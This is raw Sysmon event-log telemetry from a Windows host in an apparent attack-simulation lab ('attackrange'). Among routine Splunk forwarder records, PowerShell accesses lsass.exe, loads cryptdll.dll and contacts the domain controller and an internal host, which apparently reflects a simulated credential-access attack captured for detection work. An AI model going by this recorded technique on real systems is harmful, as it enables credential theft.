18:18:15.084{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=403A3872E666D21D76A36676510B1E42,SHA256=9FCB15B08B65C1AF3F00AEA9C6084C7FD94EB23FA5AF6068CA6F992A9E76CBC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:15.084{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=30FFCDFDE5ABB8EDA9440155A1A19426,SHA256=A81F680CA7C957270514C556A7A177B54280922C851A0B1ABD2829A0DCF8709D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=522D450339F7AE8BE981B840A1B395F5,SHA256=F5E9626663EFA8B1DD8C1CDAF6C86128E8F7101A41D04DF937740FCF9D5BB53A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.545{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=11078065DF3FC7F8E0322A6DDB343A03,SHA256=39B4A8B7636CE49B8B8A60F3D7BA1D7D8D7CB5F8D62FD79617B7E92F1C244135,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.513{B81B27B7-4FF3-613A-8190-03000000C801}5504ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:28.408{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035086199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:28.408{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035086198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:28.392{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035086197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:28.361{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 734700x800000000000000035086196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.314{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000035086195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:28.300{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.299{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035086193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.292{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FF4-613A-8290-03000000C801}296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.290{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:28.290{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.290{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:28.290{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.289{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4FF4-613A-8290-03000000C801}296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.289{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FF4-613A-8290-03000000C801}296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.271{B81B27B7-4FF4-613A-8290-03000000C801}296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.282{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CA5EFF2EC9737586F1FF65A397BAA57,SHA256=2DA065DABE5CCC3B7731771ECA7CACA227E7F98F0DA96B942207B5E79C8F97B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035086184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.230{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=379892E442E228AB93B61901863E1D3B,SHA256=254DDF3A16A2E5CD449E98292210C73CFA44EEED78CAA6316A2F48B0DF4A9AF0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=60EC74D2A789A34724B15155A31AA487,SHA256=4D7F57E655947FB40E915718DF0ADFB7AAEF12AC077A1666D87EDBB12FE680D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.519{00000000-0000-0000-0000-000000000000}5504<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56815-false10.0.1.14WIN-DC-12849666- 354300x800000000000000035086225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.516{00000000-0000-0000-0000-000000000000}5504<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56814-false10.0.1.14WIN-DC-128135epmap 354300x800000000000000035086224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.505{00000000-0000-0000-0000-000000000000}5504<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56813-false10.0.1.14WIN-DC-128389ldap 
354300x800000000000000035086223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.425{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56811-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035086222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.425{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56812-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035086221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.423{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56810-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035086220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.382{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56809-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035086219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.335{00000000-0000-0000-0000-000000000000}5504<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56808-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035086218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:53.844{00000000-0000-0000-0000-000000000000}5504<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56807-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal8000- 23542300x800000000000000035086217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:29.828{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2D6425C18060048F2740B77111F3EAF7,SHA256=479E4D5D807937BFA8797309F337A1DB283AF5F9233F216F0C99B50F484BF924,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:29.828{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=164114039F6AB4A643BE69479672B601,SHA256=BD72C8495438A2F63A7CD662B4DEFFD40439ACA532DF9AF372CA487F177BAD92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:29.130{B81B27B7-4FF4-613A-8390-03000000C801}57646548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035086229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:54.817{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56816-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 22542200x800000000000000035086228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.338{00000000-0000-0000-0000-000000000000}5504win-dc-128.attackrange.local0::ffff:10.0.1.14;<unknown process> 23542300x800000000000000035086227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:30.009{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7D751B91AE2FEB448553E19A0F5BEA8,SHA256=0C366E3AFB0F8C1F2F8E4EBB44B5D2DD83C7AFC35D02AF67CFA2FB3A7BDBC539,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:31.073{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91A25A4ECC80380D0CFE54BBC6B4E539,SHA256=476C8DDD917DB908A0A439BB4E714E8134EB090151694E614CD1BFF71FEA601F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:32.105{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F70AB1A63519E4B6D04B6AB60D604D66,SHA256=49A168280B6A854B28E86C704AD234D4D64C1EC229AB252B7B4C6D54B20B47D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:33.125{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A18A676D99E0CA01BA7C670098F2CBB4,SHA256=EF5148247D7DAA3B90DC1CA19998F6672CCAD50A93044B087FF807B038CA2EC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 